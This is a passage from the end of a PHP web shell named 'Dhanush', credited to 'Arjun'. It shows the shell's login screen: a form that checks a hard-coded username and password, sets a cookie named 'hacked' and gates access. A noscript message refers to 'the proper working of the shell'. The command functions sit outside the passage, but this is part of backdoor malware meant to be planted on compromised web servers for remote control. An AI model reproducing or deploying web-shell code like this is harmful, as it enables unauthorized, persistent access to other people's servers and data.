6185<hr color="#1B1B1B">
6186<div align="center">
6187<font size="6" face="Times New Roman, Times, serif" color="#00CC00">धनुष<br>
6188--==Coded By Arjun==--</font><br><a href="http://www.google.com/search?q=%E0%A4%9C%E0%A4%AF%20%E0%A4%B9%E0%A4%BF%E0%A4%A8%E0%A5%8D%E0%A4%A6" target="_blank"><font color="#FF0000" size="6">जय हिन्द</font></a></div>
6189<?php
6190}
6191}
6192
6193if(isset($_POST['uname']) && isset($_POST['passwd']))
6194{
6195 if( $_POST['uname'] == $user && $_POST['passwd'] == $pass )
6196 {
6197 setcookie("hacked", md5($pass));
6198 $selfenter = $_SERVER["PHP_SELF"];
6199 header("Location:$selfenter");
6200 }
6201}
6202
6203if((!isset($_COOKIE['hacked']) || $_COOKIE['hacked']!=md5($pass)) )
6204{
6205 shellstyle();
6206?>
6207 <center>
6208 <form method="POST">
6209 <div style="background-color:#171717; width:50%; border-radius:7px; margin-top:150px; -moz-border-radius:25px; height:410px; background-image:url(Windows_7_-_Alien_from_outer_space.jpg);">
6210 <table cellpadding="9" cellspacing="4">
6211 <tr>
6212 <td align="center" colspan="2"><blink><font size="7"><b>Dhanush</b></font></blink></td>
6213 </tr>
6214 <tr>
6215 <td align="right"><b>User Name : </b></td>
6216 <td><input type="text" name="uname" style="background-color:#333333; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;" value="User Name" onFocus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}" onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
6217 </tr>
6218 <tr>
6219 <td align="right"><b>Password : </b></td>
6220 <td><input type="password" name="passwd" style="background-color:#333333; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;" value="User Name" onFocus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}" onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
6221 </tr>
6222 <tr>
6223 <td align="center" colspan="2"><input type="submit" class="but" value=" Enter "></td>
6224 </tr>
6225 <tr>
6226 <td align="center" colspan="2"><font size="6" face="Times New Roman, Times, serif"><b>--==Coded By Arjun==--</b></font></td>
6227 </tr>
6228 <tr>
6229 <td colspan="2"><font size="4" face="Times New Roman, Times, serif"><noscript>Enable Javascript in your browser for the proper working of the shell</noscript></font></td>
6230 </tr>
6231 </table>
6232 </div>
6233
6234 </form>
6235 </center>
6236<br>
6237</body>
6238</html>
6239<?php
6240}
6241?>